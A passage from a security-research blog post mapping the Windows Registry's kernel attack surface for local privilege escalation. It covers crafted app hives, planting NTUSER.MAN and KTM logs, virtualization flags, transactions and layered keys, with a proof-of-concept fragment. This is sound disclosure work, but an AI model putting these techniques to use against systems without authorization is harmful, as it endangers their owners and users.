A classic example of such a bug is CVE-2024-26182, which occurred at the intersection of the CmpAddSubKeyEx (outer) and CmpAddSubKeyToList (inner) functions. The problem here was that CmpAddSubKeyToList implements complex, potentially multi-step logic for expanding the subkey list, which could perform a cell reallocation and subsequently encounter an OOM error. On the other hand, the CmpAddSubKeyEx function assumed that the cell index in the subkey list should only be updated in the hive structures if CmpAddSubKeyToList fully succeeds. As a result, the partial success of CmpAddSubKeyToList could lead to a classic use-after-free situation. An attentive reader will probably notice that the return value type of the CmpAddSubKeyToList routine was BOOL and not NTSTATUS, but the bug pattern is identical.
Overall complexity introduced over time
One of the biggest problems with the modern implementation of the registry is that over the decades of developing this functionality, many changes and new features have been introduced. This has caused the level of complexity of its internal state to increase so much that it seems difficult to grasp for one person, unless they are a registry expert who has worked on it full-time over a period of months or years. I personally believe that the registry existed in its most elegant form somewhere around Windows NT 3.1 – 3.51 (i.e. in the years 1993–1996). At the time, the mechanism was intuitive and logical for both developers and its users. Each object (key, value) either existed or not, each operation ended in either success or failure, and when it was requested on a particular key, you could be sure that it was actually performed on that key. Everything was simple, and black and white. However, over time, more and more shades of gray were being continuously added, departing from the basic assumptions:
The existence of predefined keys meant that every operation could no longer be performed on every key, as this special type of key was unsafe for many internal registry functions to use due to its altered semantics.
Due to symbolic links, opening a specific key doesn't guarantee that it will be the intended one, as it might be a different key that the original one points to.
Registry virtualization has introduced further uncertainty into key operations. When an operation is performed on a key, it is unclear whether the operation is actually executed on that specific key or redirected to a different one. Similarly, with read operations, a client cannot be entirely certain that it is reading from the intended key, as the data may be sourced from a different, virtualized location.
Transactions in the registry mean that a given state is no longer considered solely within the global view of the registry. At any given moment, there may also be changes that are visible only within a certain transaction (when they are initiated but not yet committed), and this complex scenario must be correctly handled by the kernel.
Layered keys have transformed the nature of hives, making them interdependent rather than self-contained database units. This is due to the introduction of differencing hives, which function solely as "patch diffs" and cannot exist independently without a base hive. Additionally, the semantics of certain objects and their fields have been altered. Previously, a key's existence was directly tied to the presence of a corresponding key node within the hive. Layered keys have disrupted this dependency. Now, a key with a key node can be non-existent if marked as a Tombstone, and a key without a corresponding key node can logically exist if its semantics are Merge-Unbacked, referencing a lower-level key with the same name.
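The altered existence semantics of layered keys can be captured in a tiny decision function. This is an illustrative model only; the enum is made up and does not mirror the real kernel encoding of key semantics.

```c
#include <assert.h>
#include <stdbool.h>

/* Illustrative (made-up) model of layered-key existence semantics. */
typedef enum {
    KEY_REGULAR,        /* ordinary key backed by a key node              */
    KEY_TOMBSTONE,      /* key node present, but the key is deleted       */
    KEY_MERGE_UNBACKED  /* no key node; defers to a lower-layer key       */
} KeySemantics;

static bool key_logically_exists(bool has_key_node, KeySemantics sem) {
    if (has_key_node)
        return sem != KEY_TOMBSTONE;   /* a Tombstone hides the node     */
    return sem == KEY_MERGE_UNBACKED;  /* exists via the lower-layer key */
}
```

Note how the simple pre-Vista invariant "key exists if and only if its key node exists" no longer holds in either direction.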
Of course, all of these mechanisms were designed and implemented for a specific purpose: either to make life easier for developers/applications using the Registry API, or to introduce some new functionality that is needed today. The problem is not that they were added, but that it seems that the initial design of the registry was simply not compatible with them, so they were sort of forced into the registry, and where they didn't fit, an extra layer of tape was added to hold it all together. This ultimately led to a massive expansion of the internal state that needs to be maintained within the registry. This is evident both in the significant increase in the size of old structures (like KCB) and in the number of new objects that have been added over the years. But the most unfortunate aspect is that each of these more advanced mechanisms seems to have been designed to solve one specific problem, assuming that they would operate in isolation. And indeed, they probably do under typical conditions, but a particularly malicious user could start combining these different mechanisms and making them interact. Given the difficulty in logically determining the expected behavior of some of these combinations, it is doubtful that every such case was considered, documented, implemented, and tested by Microsoft.
The relationships between the various advanced mechanisms in the registry are humorously depicted in the image below:
This section describes the entry points that a local attacker can use to interact with the registry and exploit any potential vulnerabilities.
Hive loading
Let's start with the operation of loading user-controlled hives. Since hive loading is only possible from disk (and not, for example, from a memory buffer), this means that to actually trigger this attack surface, the process must be able to create a file with controlled content, or at least a controlled prefix of several kilobytes in length. Regular programs operating at Medium IL generally have this capability, but write access to disk may be restricted for heavily sandboxed processes (e.g. renderer processes in browsers).
When it comes to the typical type of bugs that can be triggered in this way, what primarily comes to mind are issues related to binary data parsing, and memory safety violations such as out-of-bounds buffer accesses. It is possible to encounter more logical-type issues, but they usually rely on certain assumptions about the format not being sufficiently verified, causing subsequent operations on such a hive to run into problems. It is very rare to find a vulnerability that can be both triggered and exploited by just loading the hive, without performing any follow-up actions on it. But as CVE-2024-43452 demonstrates, it can still happen sometimes.
App hives
The introduction of Application Hives in Windows Vista caused a significant shift in the registry attack surface. It allowed unprivileged processes to directly interact with kernel code that was previously only accessible to system services and administrators. Attackers gained access to much of the NtLoadKey syscall logic, including hive file operations, hive parsing at the binary level, hive validation logic in the CmpCheckRegistry function and its subfunctions, and so on. In fact, of the 53 serious vulnerabilities I discovered during my research, 16 (around 30%) either required loading a controlled hive as an app hive, or were significantly easier to trigger using this mechanism.
It's important to remember that while app hives do open up a broad range of new possibilities for attackers, they don't offer exactly the same capabilities as loading normal (non-app) hives due to several limitations and specific behaviors:
They must be loaded under the special path \Registry\A, which means an app hive cannot be loaded just anywhere in the registry hierarchy. This special path is further protected from references by a fully qualified path, which also reduces their usefulness in some offensive applications.
The logic for unloading app hives differs from unloading standard hives because the process occurs automatically when all handles to the hive are closed, rather than manually unloading the hive through the RegUnLoadKeyW API or its corresponding syscall from the NtUnloadKey family.
Operations on app hive security descriptors are very limited: any calls to the RegSetKeySecurity function or RegCreateKeyExW with a non-default security descriptor will fail, which means that new descriptors cannot be added to such hives.
KTM transactions are unconditionally blocked for app hives.
Despite these minor restrictions, the ability to load arbitrary hives remains one of the most useful tools when exploiting registry bugs. Even if binary control of the hive is not strictly required, it can still be valuable. This is because it allows the attacker to clearly define the initial state of the hive where the attack takes place. By taking advantage of the cell allocator's determinism, it is often possible to achieve 100% exploitation success.
User hives and Mandatory User Profiles
Sometimes, triggering a specific bug requires both binary control over the hive and certain features that app hives lack, such as the ability to open a key via its full path. In such cases, an alternative to app hives exists, which might be slightly less practical but still allows for exploiting these more demanding bugs. It involves directly modifying one of the two hives assigned to every user in the system: the user hive (C:\Users\<username>\NTUSER.DAT mounted under \Registry\User\<SID>, or in other words, HKCU) or the user classes hive (C:\Users\<username>\AppData\Local\Microsoft\Windows\UsrClass.dat mounted under \Registry\User\<SID>_Classes). Naturally, when these hives are actively used by the system, access to their backing files is blocked, preventing simultaneous modification, which complicates things considerably. However, there are two ways to circumvent this problem.
The first scenario involves a hypothetical attacker who has two local accounts on the targeted system, or similarly, two different users collaborating to take control of the computer (let's call them users A and B). User A can grant user B full rights to modify their hive(s), and then log out. User B then makes all the required binary changes to the hive and finally notifies user A that they can log back in. At this point, the Profile Service loads the modified hive on behalf of that user, and the initial goal is achieved.
The second option is more practical as it doesn't require two different users. It abuses Mandatory User Profiles, a system functionality that prioritizes the NTUSER.MAN file in the user's directory over the NTUSER.DAT file as the user hive, if it exists (it doesn't exist in the default system installation). This means that a single user can place a specially prepared hive under the NTUSER.MAN name in their home directory, then log out and log back in. Afterwards, NTUSER.MAN will be the user's active HKCU key, achieving the goal. However, the technique also has some drawbacks – it only applies to the user hive (not UsrClass.dat), and it is somewhat noisy. Once the NTUSER.MAN file has been created and loaded, there is no way to delete it by the same user, as it will always be loaded by the system upon login, effectively blocking access to it.
A few examples of bugs involving one of the two above techniques are CVE-2023-21675, CVE-2023-35356, and CVE-2023-35633. They all required the existence of a special type of key called a predefined key within a publicly accessible hive, such as HKCU. Even when predefined keys were still supported, they could not be created using the system API, and the only way to craft them was by directly setting a specific flag within the internal key node structure in the hive file.
Log file parsing: .LOG/.LOG1/.LOG2
One of the fundamental features of the registry is that it guarantees consistency at the level of interdependent cells that together form the structure of keys within a given hive. This refers to a situation where a single operation on the registry involves the simultaneous modification of multiple cells. Even if there is a power outage and the system restarts in the middle of performing this operation, the registry guarantees that all intermediate changes will either be applied or discarded. Such "atomicity" of operations is necessary in order to guarantee the internal consistency of the hive structure, which, as we know, is important to security. The mechanism is implemented by using additional files associated with the hive, where the intermediate state of registry modifications is saved with the granularity of a memory page (4 KiB), and which can be safely rolled forward or rolled back at the next hive load. Usually these are two files with the .LOG1 and .LOG2 extensions, but it is also possible to force the use of a single log file with the .LOG extension by passing the REG_HIVE_SINGLE_LOG flag to syscalls from the NtLoadKey family.
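The page-granular bookkeeping can be sketched as a simple bitmap with one bit per 4 KiB page of hive data. This is a toy model for illustration; the kernel keeps an equivalent structure in the hive's internal bookkeeping, and the on-disk encoding differs between the two log formats.

```c
#include <assert.h>
#include <stdint.h>
#include <string.h>

#define HIVE_PAGE_SIZE 4096u

/* Toy dirty-page bitmap: one bit per 4 KiB page of a small toy hive. */
typedef struct {
    uint8_t bits[64]; /* enough for 512 pages = 2 MiB of toy hive data */
} DirtyVector;

/* Mark the page containing the given hive offset as modified. */
static void mark_dirty(DirtyVector *dv, uint32_t hive_offset) {
    uint32_t page = hive_offset / HIVE_PAGE_SIZE;
    dv->bits[page / 8] |= (uint8_t)(1u << (page % 8));
}

static int is_dirty(const DirtyVector *dv, uint32_t page) {
    return (dv->bits[page / 8] >> (page % 8)) & 1;
}
```

At flush time, only the pages whose bits are set need to be written out to the log, which is what makes recovery after a crash both possible and reasonably cheap.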
Internally, each LOG file can be encoded in one of two formats. One is the "legacy log file", a relatively simple format that has existed since the first implementation of the registry in Windows NT 3.1. The other is the "incremental log file", a slightly more modern and complex format introduced in Windows 8.1 to address performance issues that plagued the previous version. Both formats use the same header as the normal regf format (the first 512 bytes of the _HBASE_BLOCK structure, up to the CheckSum field), with the Type field set to 0x1 (legacy log file on Windows XP and newer), 0x2 (legacy log file on Windows 2000 and older), or 0x6 (incremental log file). Further at offset 0x200, legacy log files contain the signature 0x54524944 ("DIRT") followed by the "dirty vector", while incremental log files contain successive records represented by the magic value 0x454C7648 ("HvLE").
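The multi-byte signatures decode to their ASCII names when viewed as little-endian integers, which a short check makes explicit (a sketch assuming a little-endian host, as on x86):

```c
#include <assert.h>
#include <stdint.h>
#include <string.h>

#define LOG_SIG_DIRT 0x54524944u /* "DIRT", legacy log file      */
#define LOG_SIG_HVLE 0x454C7648u /* "HvLE", incremental log file */

/* On a little-endian machine, the 32-bit signature lays out in memory
 * as the ASCII string it is named after. */
static int sig_matches(uint32_t sig, const char *ascii) {
    char bytes[4];
    memcpy(bytes, &sig, sizeof(bytes));
    return memcmp(bytes, ascii, 4) == 0;
}
```

This is the same trick used throughout the regf format: 0x66676572, for instance, is simply "regf" stored as a little-endian dword.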
From a security perspective, it's important to note that LOG files are processed for app hives, so their handling is part of the local attack surface. On the other hand, this attack surface isn't particularly large, as it boils down to just a few functions that are called by the two highest-level routines: HvAnalyzeLogFiles and HvpPerformLogFileRecovery. The potential types of bugs are also fairly limited, mainly consisting of shallow memory safety violations. Two specific examples of vulnerabilities related to this functionality are CVE-2023-35386 and CVE-2023-38154.
Log file parsing: KTM logs
Besides ensuring atomicity at the level of individual operations, the Windows Registry also provides two ways to achieve atomicity for entire groups of operations, such as creating a key and setting several of its values as part of a single logical unit. These mechanisms are based on two different types of transactions: KTM transactions (managed by the Kernel Transaction Manager, implemented by the tm.sys driver) and lightweight transactions, which were designed specifically for the registry. Notably, lightweight transactions exist in memory only and are never written to disk, so they do not represent an attack vector during hive loading, because there is no file recovery logic.
KTM transactions are available for use in any loaded hive that doesn't have the REG_APP_HIVE and REG_HIVE_NO_RM flags set. To utilize them, a transaction object must first be created using the CreateTransaction API. The resulting handle is then passed to the RegOpenKeyTransacted, RegCreateKeyTransacted, or RegDeleteKeyTransacted registry functions. Finally, the entire transaction is committed via CommitTransaction. Windows attempts to guarantee that active transactions that are caught mid-commit during a sudden system shutdown will be rolled forward when the hive is loaded again. To achieve this, the Windows kernel employs the Common Log File System interface to save serialized records detailing individual operations to the .blf files that accompany the main hive file. When a hive is loaded, the system checks for unapplied changes in these .blf files. If any are found, it deserializes the individual records and attempts to redo all the actions described within them. This logic is primarily handled by the internal functions CmpRmAnalysisPhase, CmpRmReDoPhase, and CmpRmUnDoPhase, as well as the functions surrounding them in the control flow graph.
Given that KTM transactions are never enabled for app hives, the possibility of an unprivileged user exploiting this functionality is severely limited. The only option is to focus on KTM log files associated with regular hives that a local user has some control over, namely the user hive (NTUSER.DAT) and the user classes hive (UsrClass.dat). If a transactional operation is performed on a user's HKCU hive, additional .regtrans-ms and .blf files appear in their home directory. Furthermore, if these files don't exist at first, they can be planted on the disk manually, and will be processed by the Windows kernel after logging out and logging back in. Interestingly, even when the KTM log files are actively in use, they have the read sharing mode enabled. This means that a user can write data to these logs by performing transactional operations, and read from them directly at the same time.
Historically, the handling of KTM logs has been affected by a significant number of security issues. Between 2019 and 2020, James Forshaw reported three serious bugs in this code: CVE-2019-0959, CVE-2020-1377, and CVE-2020-1378. Subsequently, during my research, I discovered three more: CVE-2023-28271, CVE-2023-28272, and CVE-2023-28293. However, the strangest thing is that, according to my tests, the entire logic for restoring the registry state from KTM logs stopped working due to code refactoring introduced in Windows 10 1607 (almost 9 years ago) and has not been fixed since. I described this observation in another report related to transactions, in a section called "KTM transaction recovery code". I'm not entirely sure whether I'm making a mistake in testing, but if this is truly the case, it means that the entire recovery mechanism currently serves no purpose and only needlessly increases the system's attack surface. Therefore, it could be safely removed or, at the very least, actually fixed.
Direct registry operations through standard syscalls
Direct operations on keys and values are the core of the registry and make up most of its associated code within the Windows kernel. These basic operations don't need any special permissions and are accessible by all users, so they constitute the primary attack surface available to a local attacker. These actions have been summarized at the beginning of blog post #2, and should probably be familiar by now. As a recap, here is a table of the available operations, including the corresponding high-level API function, system call name, and internal kernel function name if it differs from the syscall:
[Table: Operation name | Registry API name(s) | System call(s) | Internal kernel handler (if different than syscall)]
A regular user can directly load only application hives, using the RegLoadAppKey function or its corresponding syscalls with the REG_APP_HIVE flag. Loading standard hives, using the RegLoadKey function, is reserved for administrators only. However, this operation is still indirectly accessible to other users through the NTUSER.MAN hive and the Profile Service, which can load it as a user hive during system login.
When selecting API functions for the table above, I prioritized their latest versions (often with the "Ex" suffix, meaning "extended"). I also chose those that are the thinnest wrappers and closest in functionality to their corresponding syscalls on the kernel side. In the official Microsoft documentation, you'll also find many older/deprecated versions of these functions, which were available in early Windows versions and now exist solely for backward compatibility (e.g., RegOpenKey, RegEnumKey). Additionally, there are also helper functions that implement more complex logic on the user-mode side (e.g., RegDeleteTree, which recursively deletes an entire subtree of a given key), but they don't add anything in terms of the kernel attack surface.
There are several operations natively supported by the kernel that do not have a user-mode equivalent, such as NtQueryOpenSubKeys or NtSetInformationKey. The only way to use these interfaces is to call their respective system calls directly, which is most easily achieved by calling their wrappers with the same name in the ntdll.dll library. Furthermore, even when a documented API function exists, it may not expose all the capabilities of its corresponding system call. For example, the RegQueryInfoKey function returns some information about a key, but much more can be learned by using NtQueryKey directly with one of the supported information classes.
Moreover, there is a group of syscalls that do require administrator rights (specifically SeBackupPrivilege, SeRestorePrivilege, or PreviousMode set to KernelMode). These syscalls are used either for registry management by the kernel or system services, or for purely administrative tasks (such as performing registry backups). They are not particularly interesting from a security research perspective, as they cannot be used to elevate privileges, but it is worth mentioning them by name:
NtCompactKeys
NtCompressKey
NtFreezeRegistry
NtInitializeRegistry
NtLockRegistryKey
NtQueryOpenSubKeysEx
NtReplaceKey
NtRestoreKey
NtSaveKey
NtSaveKeyEx
NtSaveMergedKeys
NtThawRegistry
NtUnloadKey
NtUnloadKey2
NtUnloadKeyEx
Incorporating advanced features
Despite the fact that most power users are familiar with the basic registry operations (e.g., from using Regedit.exe), there are still some modifiers that can change the behavior of these operations, thereby complicating their implementation and potentially leading to interesting bugs. To use these modifiers, additional steps are often required, such as enabling registry virtualization, creating a transaction, or loading a differencing hive. When this is done, the information about the special key properties is encoded within the internal kernel structures, and the key handle itself is almost indistinguishable from other handles as seen by the user-mode application. When operating on such advanced keys, the logic for their handling is executed in the standard registry syscalls transparently to the user. The diagram below illustrates the general, conceptual control flow in registry-related system calls:
This is a very simplified outline of how registry syscalls work, but it shows that a function theoretically supporting one operation can actually hide many implementations that are dynamically chosen based on various factors. In terms of specifics, there are significant differences depending on the operation and whether it is a "read" or "write" one. For example, in "read" operations, the execution paths for transactional and non-transactional operations are typically combined into one that has built-in transaction support but can also operate without them. On the other hand, in "write" operations, normal and transactional operations are always performed differently, but there isn't much code dedicated to layered keys (except for the so-called key promotion operations), since when writing to a layered key, the state of keys lower on the stack is usually not as important. As for the "Internal operation handler" area marked within the large rectangle with the dotted line, these are internal functions responsible for the core logic of a specific operation, and whose names typically begin with "Cm" instead of "Nt". For example, for the NtDeleteKey syscall, the corresponding internal handler is CmDeleteKey, for NtQueryKey it is CmQueryKey, for NtEnumerateKey it is CmEnumerateKey, and so on.
In the following sections, we will take a closer look at each of the possible complications.
Predefined keys and symbolic links
Predefined keys were deprecated in 2023, so I won't spend much time on them here. It's worth mentioning that on modern systems, it wasn't possible to create them in any way using the API, or even directly using syscalls. The only way to craft such a key in the registry was to create it in binary form in a controlled hive file and have it loaded via RegLoadAppKey or as a user hive. These keys had very strange semantics, both at the key node level (unusual encoding of _CM_KEY_NODE.ValueList) and at the kernel key body object level (non-standard value of _CM_KEY_BODY.Type). Due to the need to filter out these keys at an early stage of syscall execution, there are special helper functions whose purpose is to open the key by handle and verify whether it is or isn't a predefined handle (CmObReferenceObjectByHandle and CmObReferenceObjectByName). Consequently, hunting for bugs related to predefined handles involved verifying whether each syscall used the above wrappers correctly, and whether there was some other way to perform an operation on this type of key while bypassing the type check. As I have mentioned, this is now just a thing of the past, as predefined handles in input hives are no longer supported and therefore do not pose a security risk to the system.
When it comes to symbolic links, this is a semi-documented feature that requires calling the RegCreateKeyEx function with the special REG_OPTION_CREATE_LINK flag to create them. Then, you need to set a value named "SymbolicLinkValue" and of type REG_LINK, which contains the target of the symlink as an absolute, internal registry path (\Registry\...) written using wide characters. From that point on, the link points to the specified path. However, it's important to remember that traversing symbolic links originating from non-system hives is heavily restricted: it can only occur within a single "trust class" (e.g., between the user hive and user classes hive of the same user). As a result, links located in app hives are never fully functional, because each app hive resides in its own isolated trust class, and they cannot reference themselves either, as references to paths starting with "\Registry\A" are blocked by the Windows kernel.
As for auditing symbolic links, they are generally resolved during the opening/creation of a key. Therefore, the analysis mainly involves the CmpParseKey function and lower-level functions called within it, particularly CmpGetSymbolicLinkTarget, which is responsible for reading the target of a given symlink and searching for it in existing registry structures. Issues related to symlinks can also be found in registry callbacks registered by third-party drivers, especially those that handle the RegNtPostOpenKey/RegNtPostCreateKey and similar operations. Correctly handling "reparse" return values and the multiple call loops performed by the NT Object Manager is not an easy feat to achieve.
Registry virtualization
Registry virtualization, introduced in Windows Vista, ensures backward compatibility for older applications that assume administrative privileges when using the registry. This mechanism redirects references between HKLM\Software and HKU\<SID>_Classes\VirtualStore subkeys transparently, allowing programs to "think" they write to the system hive even though they don't have sufficient permissions for it. The virtualization logic, integrated into nearly every basic registry syscall, is mostly implemented by three functions:
CmKeyBodyRemapToVirtualForEnum: Translates a real key inside a virtualized hive (HKLM\Software) to a virtual key inside the VirtualStore of the user classes hive during read-type operations. This is done to merge the properties of both keys into a single state that is then returned to the caller.
CmKeyBodyRemapToVirtual: Translates a real key to its corresponding virtual key, and is used in the key deletion and value deletion operations. This is done to delete the replica of a given key in VirtualStore or one of its values, instead of its real instance in the global hive.
CmKeyBodyReplicateToVirtual: Replicates the entire key structure that the caller wants to create in the virtualized hive, inside of the VirtualStore.
All of the above functions have a complicated control flow, both in terms of low-level implementation (e.g., they implement various registry path conversions) and logically – they create new keys in the registry, merge the states of different keys into one, etc. As a result, it doesn't really come as a big surprise that the code has been affected by many vulnerabilities. Triggering virtualization doesn't require any special rights, but it does need a few conditions to be met:
Virtualization must be specifically enabled for a given process. This is not the default behavior for 64-bit programs but can be easily enabled by calling the SetTokenInformation function with the TokenVirtualizationEnabled argument on the security token of the process.
Depending on the desired behavior, the appropriate combination of VirtualSource/VirtualTarget/VirtualStore flags should be set in _CM_KEY_NODE.Flags. This can be achieved either through binary control over the hive or by setting it at runtime using the NtSetInformationKey call with the KeySetVirtualizationInformation argument.
The REG_KEY_DONT_VIRTUALIZE flag must not be set in the _CM_KEY_NODE.VirtControlFlags field for a given key. This is usually not an issue, but if necessary, it can be adjusted either in the binary representation of the hive or using the NtSetInformationKey call with the KeyControlFlagsInformation argument.
In specific cases, the source key must be located in a virtualizable hive. In such scenarios, the HKLM\Software\Microsoft\DRM key becomes very useful, as it meets this condition and has a permissive security descriptor that allows all users in the system to create subkeys within it.
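To make the redirection concrete, here is a minimal, portable sketch of the path translation that virtualization conceptually performs. The helper name is mine, and the exact VirtualStore sub-path layout (MACHINE\SOFTWARE) is included as an assumption for illustration; the real logic lives in the kernel functions listed above and operates on internal structures, not strings.

```cpp
#include <string>

// Illustrative model (not kernel code): translate a key path under
// HKLM\Software into its per-user VirtualStore counterpart, the way
// CmKeyBodyRemapToVirtual conceptually does. The VirtualStore sub-path
// (MACHINE\SOFTWARE) is an assumption made for this sketch.
std::string RemapToVirtualStore(const std::string& sid,
                                const std::string& global_path) {
  const std::string prefix = "HKLM\\Software\\";
  if (global_path.compare(0, prefix.size(), prefix) != 0) {
    return global_path;  // Not in a virtualized location; no remapping.
  }
  return "HKU\\" + sid + "_Classes\\VirtualStore\\MACHINE\\SOFTWARE\\" +
         global_path.substr(prefix.size());
}
```

A path outside the virtualized tree (e.g., under HKLM\System) is returned unchanged, mirroring the fact that only specific hives are subject to virtualization.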
With regards to the first two points, many examples of virtualization-related bugs can be found in the Project Zero bug tracker. These reports include proof-of-concept code that correctly sets the appropriate flags. For simplicity, I will share the relevant snippet here as well; it calls two C++ helper functions, EnableTokenVirtualization and EnableKeyVirtualization, which are responsible for enabling virtualization for a given security token and registry key:
    printf("OpenProcessToken failed with error %u\n", GetLastError());
    return 1;
  }

  //
  // Enable virtualization for the token.
  //
  EnableTokenVirtualization(hToken, TRUE);

  //
  // Enable virtualization for the key.
  //
  hKey = RegOpenKeyExW(...);
  EnableKeyVirtualization(hKey,
                          /*VirtualTarget=*/TRUE,
                          /*VirtualStore=*/TRUE,
                          /*VirtualSource=*/FALSE);
Transactions
There are two types of registry transactions: KTM and lightweight. The former are transactions implemented on top of the tm.sys (Transaction Manager) driver, and they try to provide certain guarantees of transactional atomicity both during system run time and even across reboots. The latter, as the name suggests, are lightweight transactions that exist only in memory and whose task is to provide an easy and quick way to ensure that a given set of registry operations is applied atomically. As potential attackers, there are three parts of the interface that we are interested in the most: creating a transaction object, rolling back a transaction, and committing a transaction. For KTM transactions, these three actions are performed by the CreateTransaction, RollbackTransaction and CommitTransaction functions, respectively; for lightweight transactions, by the NtCreateRegistryTransaction, NtRollbackRegistryTransaction and NtCommitRegistryTransaction syscalls.
As we can see, the KTM has a public, documented API interface, which cannot be said for lightweight transactions that can only be used via syscalls. Their definitions, however, are not too difficult to reverse engineer, and they come down to the following prototypes:
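The prototypes below follow the reconstructions available in public reverse-engineering headers (e.g., the phnt project); the parameter names are conventional rather than official:

```
NTSTATUS NtCreateRegistryTransaction(
    OUT PHANDLE TransactionHandle,
    IN ACCESS_MASK DesiredAccess,
    IN POBJECT_ATTRIBUTES ObjectAttributes OPTIONAL,
    IN ULONG Flags);             // Reserved, pass 0.

NTSTATUS NtRollbackRegistryTransaction(
    IN HANDLE TransactionHandle,
    IN ULONG Flags);             // Reserved, pass 0.

NTSTATUS NtCommitRegistryTransaction(
    IN HANDLE TransactionHandle,
    IN ULONG Flags);             // Reserved, pass 0.
```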
Upon the creation of a transaction object, whether of type TmTransactionObjectType (KTM) or CmRegistryTransactionType (lightweight), its subsequent usage becomes straightforward. The transaction handle is passed to either the RegOpenKeyTransacted or the RegCreateKeyTransacted function, yielding a key handle. The key's internal properties, specifically the key body structure, will reflect its transactional nature. Operations on this key proceed identically to the non-transactional case, using the same functions. However, changes are temporarily confined to the transaction context, isolated from the global registry view. Upon the completion of all transactional operations, the user may elect either to discard the changes via a rollback, or apply them atomically through a commit. From the developer's perspective, this interface is undeniably convenient.
From an attack surface perspective, there's a substantial amount of code underlying the transaction functionality. Firstly, the handler for each base operation includes code to verify that the key isn't locked by another transaction, to allocate and initialize a UoW (unit of work) object, and then write it to the internal structures that describe the transaction. Secondly, to maintain consistency with the new functionality, the existing non-transactional code must first abort all transactions associated with a given key before it can be modified.
But that's not the end of the story. The commit process itself is also complicated, as it must cleverly circumvent various registry limitations resulting from its original design. In 2023, most of the code responsible for KTM transactions was removed as a result of CVE-2023-32019, but there is still a second engine that was initially responsible for lightweight transactions and now handles all of them. It consists of two stages: "Prepare" and "Commit". During the prepare stage, all steps that could potentially fail are performed, such as allocating all necessary cells in the target hive. Errors are allowed and correctly handled in the prepare stage, because the globally visible state of the registry does not change yet. This is followed by the commit stage, which is designed so that nothing can go wrong – it no longer performs any dynamic allocations or other complex operations, and its whole purpose is to update values in both the hive and the kernel descriptors so that transactional changes become globally visible. The internal prepare handlers for each individual operation have names starting with "CmpLightWeightPrepare" (e.g., CmpLightWeightPrepareAddKeyUoW), while the corresponding commit handlers start with "CmpLightWeightCommit" (e.g., CmpLightWeightCommitAddKeyUoW). These are the two main families of functions that are most interesting from a vulnerability research perspective. In addition to them, it is also worth analyzing the rollback functionality, which is used both when the rollback is requested directly by the user and when an error occurs in the prepare stage. This part is mainly handled by the CmpTransMgrFreeVolatileData function.
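The prepare/commit discipline described above can be illustrated with a toy, portable model (all names are mine): every fallible step, including memory reservation, happens in the prepare stage, so the commit stage can be written with no failure paths at all.

```cpp
#include <cassert>
#include <string>
#include <utility>
#include <vector>

// Toy model of the two-stage engine: Prepare() performs every step
// that can fail -- validation and memory reservation -- while Commit()
// only publishes the already-prepared state and cannot fail.
struct KeyStore {
  std::vector<std::string> keys;  // Stands in for globally visible registry state.
};

class AddKeysTransaction {
 public:
  AddKeysTransaction(KeyStore* store, std::vector<std::string> names)
      : store_(store), staged_(std::move(names)) {}

  // "Prepare" stage: validate input and reserve all memory up front,
  // so the commit stage cannot hit an allocation failure.
  bool Prepare() {
    for (const std::string& name : staged_) {
      if (name.empty()) return false;  // Fail here, while rollback is still easy.
    }
    store_->keys.reserve(store_->keys.size() + staged_.size());
    prepared_ = true;
    return true;
  }

  // "Commit" stage: no allocations and no error paths -- push_back
  // cannot reallocate because capacity was reserved during Prepare().
  void Commit() {
    assert(prepared_);
    for (std::string& name : staged_) {
      store_->keys.push_back(std::move(name));
    }
  }

 private:
  KeyStore* store_;
  std::vector<std::string> staged_;
  bool prepared_ = false;
};
```

A failed Prepare() leaves the store untouched, which is exactly the property that makes error handling safe before the state becomes globally visible.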
Layered keys
Layered keys are the latest major change of this type in the Windows Registry, introduced in 2016. They overturned many fundamental assumptions that had been in place until then. A given logical key no longer consists solely of one key node and a maximum of one active KCB, but of a whole stack of these objects: from the layer height of the given hive down to layer zero, which is the base hive. A key that has a key node may in practice be non-existent (if marked as a tombstone), and vice versa, a key without a key node may logically exist if there is an existing key with the same name lower in its stack. In short, this whole containerization mechanism has doubled the complexity of every single registry operation, because:
Querying for information about a key has become more difficult, because instead of gathering information from just one key, it has to be potentially collected from many keys at once and combined into a coherent whole for the caller.
Performing any "write" operations has become more difficult because before writing any information to the key at a given nesting level, you first need to make sure that the key and all its ancestors in a given hive exist, which is done in a complicated process called "key promotion".
Deleting and renaming a key has become more difficult, because you always have to consider and correctly handle higher-level keys that rely on the one you are modifying. This is especially true for Merge-Unbacked keys, which do not have their own representation and only reflect the state of the keys at a lower level. This also applies to ordinary keys from hives under HKLM and HKU, which by themselves have nothing to do with differencing hives, but as an integral part of the registry hierarchy, they also have to correctly support this feature.
Performing security access checks on a key has become more challenging due to the need to accurately pinpoint the relevant security descriptor on the key stack first.
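The key-stack semantics described in the points above can be sketched with a toy model (types and names are mine; real layered keys operate on key nodes and KCBs rather than strings): lookups walk from the top layer down, a tombstone makes a key logically non-existent even though a node is present, and an absent entry falls through to lower layers.

```cpp
#include <optional>
#include <string>
#include <vector>

// Toy model of a layered key stack. Index 0 is the base hive; higher
// indices are differencing layers. A layer can hold a real value, a
// tombstone (deleted at this level), or nothing (fall through).
enum class NodeKind { kValue, kTombstone, kAbsent };

struct LayerEntry {
  NodeKind kind = NodeKind::kAbsent;
  std::string value;  // Only meaningful for kValue.
};

// Resolve a logical value by scanning from the top layer down, the way
// a layered-key query conceptually combines the key stack: the first
// layer that says anything (value or tombstone) wins.
std::optional<std::string> ResolveValue(const std::vector<LayerEntry>& stack) {
  for (auto it = stack.rbegin(); it != stack.rend(); ++it) {
    switch (it->kind) {
      case NodeKind::kValue:     return it->value;     // Overrides lower layers.
      case NodeKind::kTombstone: return std::nullopt;  // Logically deleted.
      case NodeKind::kAbsent:    break;                // Keep descending.
    }
  }
  return std::nullopt;  // Never existed at any layer.
}
```

Even this stripped-down version shows why every query must potentially touch the whole stack, and why a key node's mere presence no longer implies logical existence.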
Overall, the layered keys mechanism is so complex that it could warrant an entire blog post (or several) on its own, so I won't be able to explain all of its aspects here. Nevertheless, its existence will quickly become clear to anyone who starts reversing the registry implementation. The code related to this functionality can be identified in many ways, for example:
By references to functions that initialize the key node stack / KCB stack objects (i.e., CmpInitializeKeyNodeStack, CmpStartKcbStack, and CmpStartKcbStackForTopLayerKcb),
By dedicated functions, with names ending in "LayeredKey", that implement a given operation specifically on layered keys (e.g., CmDeleteLayeredKey, CmEnumerateValueFromLayeredKey, CmQueryLayeredKey),
By references to the KCB.LayerHeight field, which is very often used to determine whether the code is dealing with a layered key (height greater than zero) or a base key (height equal to zero).
